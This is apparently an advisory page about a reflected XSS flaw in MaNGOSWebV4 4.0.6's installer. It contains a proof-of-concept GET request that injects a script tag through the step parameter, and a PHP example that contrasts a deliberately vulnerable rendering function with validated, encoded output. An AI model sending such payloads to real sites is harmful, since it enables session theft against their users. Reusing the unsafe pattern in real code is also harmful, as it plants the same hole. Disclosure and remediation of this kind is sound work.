MaNGOSWebV4 4.0.6 Cross Site Scripting
MaNGOSWebV4 4.0.6 was affected by a Cross-Site Scripting (XSS) vulnerability.

This flaw stemmed from insufficient sanitization of user-supplied input: the PoC below passes a script tag in the step query parameter of install/index.php. Attackers could inject malicious client-side scripts (typically JavaScript) into web pages.

When other users viewed these compromised pages, their browsers would execute the injected scripts. This allowed for various malicious activities, including session hijacking (stealing user cookies), defacement of the web interface, redirection to malicious sites, or unauthorized actions on behalf of the victim.

The vulnerability was addressed in subsequent versions, highlighting the importance of input validation and output encoding in web applications.

# Exploit Title: MaNGOSWebV4 4.0.6 - Reflected XSS
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/paintballrefjosh/MaNGOSWebV4
# Software Link: https://github.com/paintballrefjosh/MaNGOSWebV4
# Version: 4.0.6
# Tested on: Ubuntu Windows
# CVE : CVE-2017-6478

PoC:
// Access the vulnerable URL and trigger the XSS payload
GET http://mangoswebv4/install/index.php?step=%3Cscript%3Ealert(1)%3C/script%3E
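
The two defenses named above, input validation and output encoding, applied to the step query parameter from the PoC. This is an added example, not code from MaNGOSWebV4 or from the exploit author; the function names, the MAX_STEP value and the markup are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for an installer page that reflects ?step= into HTML.
// MAX_STEP is an assumed value, not taken from MaNGOSWebV4.
const MAX_STEP = 7;

// Vulnerable pattern: the raw query value is concatenated into markup.
function render_step_unsafe(array $query): string
{
    $step = $query['step'] ?? '1';
    return '<h2>Installation step ' . $step . '</h2>';
}

// Input validation: accept only an integer inside the known step range.
function resolve_step(array $query): int
{
    $raw = $query['step'] ?? '1';
    if (!is_string($raw)) {          // rejects array input such as step[]=x
        return 1;
    }
    $step = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => MAX_STEP],
    ]);
    return $step === false ? 1 : $step;
}

// Output encoding: applied at the point of output, even to validated data.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_step_safe(array $query): string
{
    return '<h2>Installation step ' . e((string) resolve_step($query)) . '</h2>';
}

// Constructed input: the decoded form of the payload in the PoC request.
$query = ['step' => '<script>alert(1)</script>'];

echo render_step_unsafe($query), PHP_EOL; // raw markup is reflected as-is
echo render_step_safe($query), PHP_EOL;   // invalid step replaced by the default
echo e($query['step']), PHP_EOL;          // encoding alone, if the value must be displayed
```

Validation and encoding are kept as separate functions so that encoding still protects any later code path that outputs a value which skipped validation.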
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸